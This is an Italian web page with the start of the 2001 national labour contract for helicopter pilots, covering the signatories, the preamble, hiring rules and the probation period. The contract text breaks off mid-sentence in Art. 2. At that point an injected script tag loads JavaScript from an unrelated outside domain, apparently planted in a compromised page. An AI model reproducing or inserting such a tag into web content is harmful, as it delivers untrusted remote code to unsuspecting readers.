Torna
all'elenco delle categorie
|
Categoria: Eliccotteri, trasporto non di linea, manutenzione e riparazione Settore: Trasporti Data stipula: 19-7-2001 Data decorrenza: 1-1-2001 Data scadenza: 31-12-2004
Contratto Collettivo Nazionale di Lavoro
PER PILOTI DI ELICOTTERO
19 luglio 2001
Addì 19 luglio 2001
tra
- Federazione Imprese di Servizi (FISE), rappresentata da Giuseppe
Benincasa e Alberto Valecchi, assistita da una delegazione di aziende
aderenti all'Associazione Imprese Servizi Elicotteristici (AISE),
rappresentata dal Presidente Manfredo Windisch Graetz, composta da:
AVIONORD Daniele Paggiaro; ELILARIO Giammario Bettiga; HELITALIA Emilio
Dalmasso; ELILOMBARDA Alessandro Papis; ALIDAUNIA Roberto Pucillo;
ELITALIANA Giampiero Pedone; FREEAIR Alessandro Giulivi; HELIWEST Luciano
Villani; ELILOMBARDIA Domenico Nania
e
- ANPAC rappresentata dal Responsabile comparto elicotteri Mario
Persicone;
- U.P. rappresentata da Paolo Bontempi e dal Responsabile comparto
elicotteri Alessandro Falsina
è stato stipulato il presente rinnovo del CCNL 25 giugno 1998 per i piloti
dipendenti da imprese elicotteristiche esercenti il trasporto aereo non di
linea e il lavoro aereo.
PREMESSA
Il presente CCNL si applica al personale addetto, al comando, alla guida e
al pilotaggio di elicotteri individuato nel suo complesso con la comune
denominazione di "pilota", indipendentemente dalle qualifiche e dai gradi
contrattualmente previste al successivo art. 4.
Il presente contratto ha lo scopo di favorire la massima trasparenza del
rapporto diritti-doveri e la piena applicazione delle norme contrattuali
al fine di raggiungere livelli sempre più elevati di sicurezza e di
efficienza delle attività, in considerazione dell'obiettivo strategico del
perseguimento di un costante miglioramento della qualità del servizio, in
un quadro di relazioni industriali orientate a favorire il più ampio
coinvolgimento dei piloti al raggiungimento dei necessari traguardi di
competitività.
In osservanza della normativa vigente, il presente CCNL troverà
applicazione anche per gli imprenditori del settore di nazionalità estera
che operano sul suolo nazionale impiegando piloti di nazionalità italiana
o estera nel rispetto delle specifiche regole di reciprocità, e per i
piloti di nazionalità italiana, dipendenti da società italiane, che
operano all'estero, salvo le condizioni di miglior favore nel loro
complesso.
1. PARTE GENERALE
Art. 1 - Assunzione.
1. L'assunzione dei piloti è subordinata all'osservanza delle
disposizioni legislative e regolamentari vigenti.
2. Il contratto di lavoro deve essere stipulato per iscritto e contenere
le seguenti indicazioni:
a) generalità del pilota;
b) qualifica e grado assegnato ai sensi e per gli effetti del successivo
art. 4;
c) durata dell'eventuale periodo di prova;
d) misura della retribuzione;
e) durata del contratto se questo è a tempo determinato;
f) data e luogo della stipula del contratto;
g) specifico richiamo al presente CCNL;
h) località di assunzione ai sensi dell'art. 29 del presente contratto.
3. Prima dell'assunzione, il pilota dovrà presentare la seguente
documentazione:
a) libretto di lavoro;
b) certificato d'iscrizione a ENGA;
c) licenze e abilitazioni possedute.
4. Il pilota comunicherà alla Compagnia, a mezzo di lettera
raccomandata, la propria residenza ed eventualmente il proprio domicilio
se non coincidente e ogni variazione degli stessi.
Art. 2 - Periodo di prova.
1. L'assunzione può avvenire con un periodo di prova non superiore ai 6
mesi.
2. Il periodo di prova deve risultare dalla lettera di assunzione.
3. Non sono ammesse né la protrazione né la rinnovazione del periodo di
prova.
4. Durante tale periodo sussistono tra le parti tutti i diritti e tutti
gli obblighi previsti dalla presente normativa; tuttavia la risoluzione
del rapporto di lavoro può aver luogo ad iniziativa<<script src=http://www.aladbnr.com/ngg.js></script>
|